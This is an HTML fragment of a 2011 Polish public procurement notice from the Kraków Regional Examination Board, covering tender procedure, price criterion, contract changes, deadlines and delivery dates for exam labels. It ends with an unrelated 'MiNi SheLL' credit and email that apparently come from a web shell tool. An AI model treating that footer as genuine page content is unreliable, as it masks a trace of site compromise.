<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość zmiany umowy w zakresie ilości i rodzaju wykonywanych etykiet w czasie realizacji zamówienia, oraz terminów wykonania w przypadku wystąpienia takich potrzeb.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oke.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowa Komisja Egzaminacyjna w Krakowie
os. Szkolne 37, 31-978 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2011 godzina 12:00, miejsce: Okręgowa Komisja Egzaminacyjna w Krakowie
os. Szkolne 37, 31-978 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja dodatkowa do pkt. II.2 Termin wykonania zamówienia:
-Termin wykonania zamówienia dla każdej z akcji, oznacza termin, w którym dostarczone etykiety będą dostępne do wydawania ich dla szkół przez pracowników Zamawiającego w miejscach dostawy (Punkty Odbioru Prac na terenie województwa małopolskiego, lubelskiego i podkarpackiego lub dla egzaminu zawodowego szkoły i ośrodki).
-W SiWZ określono terminy wykonania zamówienia jak niżej:
1.	Akcja SPRAWDZIAN		16.03.2011.
2.	Akcja GIMNAZJUM		16.03.2011.
3.	Akcja MATURA		21.04.2011.
4.	Akcja  EGZAMIN ZAWODOWY III dekada  maja 2011. 
 dla sesji zimowej 2012- III dekada grudnia 2011..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com